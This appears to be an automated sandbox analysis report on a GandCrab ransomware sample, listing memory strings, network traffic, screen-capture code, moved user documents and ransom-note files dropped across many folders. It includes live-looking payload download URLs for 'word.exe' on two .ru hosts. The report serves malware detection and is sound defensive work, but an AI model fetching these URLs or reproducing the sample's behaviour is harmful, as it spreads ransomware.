Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp, 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmp	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE8B71F2A
Source: 229.exe, 00000005.00000003.1810529389.06F90000.00000004.sdmp	String found in binary or memory: https://hg.m
Source: 229.exe, 00000005.00000003.1810697326.06F90000.00000004.sdmp	String found in binary or memory: https://hg.m9
Source: 229.exe, 00000005.00000003.1810878134.06F90000.00000004.sdmp	String found in binary or memory: https://hg.mv
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: https://jewemsk.ru
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmp	String found in binary or memory: https://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://jewemsk.ru/core/components/gallery/lexicon/fr/word.exeH
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: https://jewemsk.ruH
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: https://jewemsk.ruh%
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/events/actions/current/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/domain/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/domain/#lease
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/domain/#registration
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/domain/price/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/domain/rules/
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/ecp/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/hardware/rent/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/hardware/rent/#colocation
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/hardware/rent/#smart-server
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/hosting/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/hosting/#professional
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/hosting/#unix
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/hosting/#windows
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/hosting/constructor/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/hosting/unix/edu/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/hosting/vps/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/hosting/vps/#hyperConstructor
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/hosting/vps/#vpsPlusMssql
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp, powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/mail/
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/mail/#mail_transfer
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/mail/#mail_with_hosting
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/soft/ispmanager/
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/special_packs/
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/ssl/
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/ssl/#dv
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/ssl/#ev
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: https://masterhost.ru/service/ssl/#ov
Source: 229.exe, 00000005.00000003.1807771526.06F90000.00000004.sdmp	String found in binary or memory: https://real.com/
Source: 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	String found in binary or memory: https://sourceforge.net/project/?group_id=1519
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://starstyl.ru
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmp	String found in binary or memory: https://starstyl.ru/assets/plugiH
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmp	String found in binary or memory: https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidH
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmp	String found in binary or memory: https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exeH
Source: powershell.exe, 00000004.00000002.1673288269.0234A000.00000004.sdmp	String found in binary or memory: https://starstyl.ruDj
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	String found in binary or memory: https://www.geotrust.com/resources/repository0
Source: 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmp	String found in binary or memory: https://www.google.com
Source: 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmp	String found in binary or memory: https://www.google.com/chrome/browser/desktop/
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp, 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmp	String found in binary or memory: https://www.google.com/chrome/browser/thankyou.html?platform=win
Source: 229.exe, 00000005.00000003.1817847507.0706E000.00000004.sdmp, 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmp	String found in binary or memory: https://www.google.com/images/icons/product/chrome-32.png
Source: 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmp	String found in binary or memory: https://www.google.com/intl/en/chrome/browser/privacy/eula_text.html
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp	String found in binary or memory: https://www.google.com/search?q=.net
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp	String found in binary or memory: https://www.google.com/search?q=chrome
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp	String found in binary or memory: https://www.google.com/search?q=test&ie=utf-8&oe=utf-8
Source: 229.exe, 00000005.00000003.1817847507.0706E000.00000004.sdmp	String found in binary or memory: https://www.google.de/images/branding/product/ico/googleg_lodp.ico
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp	String found in binary or memory: https://www.google.de/search?q=.net
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp, 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmp	String found in binary or memory: https://www.google.de/search?q=chrome
Source: 229.exe, 00000005.00000003.1820920259.06F90000.00000004.sdmp	String found in binary or memory: https://www.google.de/search?q=test&ie=utf-8&oe=utf-8&gws_rd=cr&ei=9yRZWNXLEMfYjwTOhpXYDg
Source: 229.exe, 00000005.00000003.1820538853.06F90000.00000004.sdmp	String found in binary or memory: https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjwzYrg7ILRAhUG0IMKHVAfDIwQ
Source: 229.exe, 00000005.00000002.1860084954.06C31000.00000004.sdmp	String found in binary or memory: https://www.kakaocorp.link/static/imgs/hehe.png
Source: 229.exe, 00000005.00000002.1860084954.06C31000.00000004.sdmp	String found in binary or memory: https://www.kakaocorp.link/static/imgs/hehe.png6
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmp	String found in binary or memory: https://www.mibbit.com/?url=%s
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/about/
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/contribute/
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/firefox/central/
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/firefox/customize/
Source: 229.exe, 00000005.00000003.1817480993.06FA7000.00000004.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/firefox/help/
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: https://www.thawte.com/cps0/
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: https://www.thawte.com/repository0W
Source: 229.exe, 00000005.00000002.1855736795.00413000.00000004.sdmp	String found in binary or memory: https://www.torproject.org/

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49224
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49223
Source: unknown	Network traffic detected: HTTP traffic on port 49227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49224 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_1_004112E0 PathCommonPrefixA,GetFileInformationByHandle,GetFileInformationByHandle,PathCompactPathA,new,OpenFileMappingA,MapViewOfFile,GetDC,SelectObject,CreateCompatibleDC,CreateFontA,SelectObject,SelectObject,SelectObject,CreateDIBSection,SelectObject,SetBkMode,SetTextColor,TextOutA,SelectObject,SendMessageA,SelectObject,SelectObject,GetOpenFileNameA,DeleteObject,DeleteObject,SelectObject,DeleteObject,DeleteObject,GetWindowDC,GetWindowRect,PdhOpenQueryA,OleTranslateColor,new,__libm_sse2_cos_precise,__libm_sse2_cos_precise,VirtualAlloc,Shell_NotifyIconA,

5_1_004112E0

Spam, unwanted Advertisements and Ransom Demands:

Modifies existing user documents (likely ransomware behavior)

Show sources

Source: C:\Windows\Temp\229.exe	File moved: C:\Users\user\Desktop\MXPXCVPDVN\NEBFQQYWPS.xlsx	Jump to behavior
Source: C:\Windows\Temp\229.exe	File moved: C:\Users\user\Desktop\Sarah_Siedler_Bewerbungsunterlagen.doc	Jump to behavior
Source: C:\Windows\Temp\229.exe	File moved: C:\Users\user\Desktop\MXPXCVPDVN\MXPXCVPDVN.docx	Jump to behavior
Source: C:\Windows\Temp\229.exe	File moved: C:\Users\user\Desktop\MXPXCVPDVN.xlsx	Jump to behavior
Source: C:\Windows\Temp\229.exe	File moved: C:\Users\user\Desktop\NEBFQQYWPS.xlsx	Jump to behavior

System Summary:

Detected GrandCrab Ransomware (readme file)

Show sources

Source: C:\Windows\Temp\229.exe	File created: C:\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\$Recycle.Bin\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1001\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1004\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1005\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\MSOCache\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\PerfLogs\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\PerfLogs\Admin\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Program Files\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Recovery\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Recovery\30698442-3747-11e0-818c-d0aae148ac37\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Local\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Local\Microsoft\Windows\History\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Local\Microsoft\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Local\Temp\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Roaming\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Roaming\Media Center Programs\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Roaming\Microsoft\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\Desktop\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\Documents\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\Music\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\Pictures\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\Videos\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\Downloads\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\Favorites\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\Links\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\Saved Games\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\bin\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\bin\client\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\bin\dtplugin\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\bin\plugin2\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\applet\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\cmm\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\deploy\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\ext\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\fonts\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\i386\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\images\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\images\cursors\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\jfr\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\management\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\security\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\limited\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\unlimited\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Collab\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Forms\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\JSCache\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\CRLCache\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Flash Player\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Flash Player\AssetCache\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Flash Player\AssetCache\P4MTYZFY\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Headlights\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Linguistics\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Adobe\LogTransport2\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Identities\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Identities\{7E3C98C2-A457-4C7B-90BC-6B7522D9BDED}\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Media Center Programs\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AddIns\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Credentials\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312302014-279660585-3511680526-1004\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Forms\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\MMC\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Proof\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-312302014-279660585-3511680526-1004\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Speech\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Document Themes\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\SmartArt Graphics\PSVULHG-MANUAL.txt	Jump to dropped file
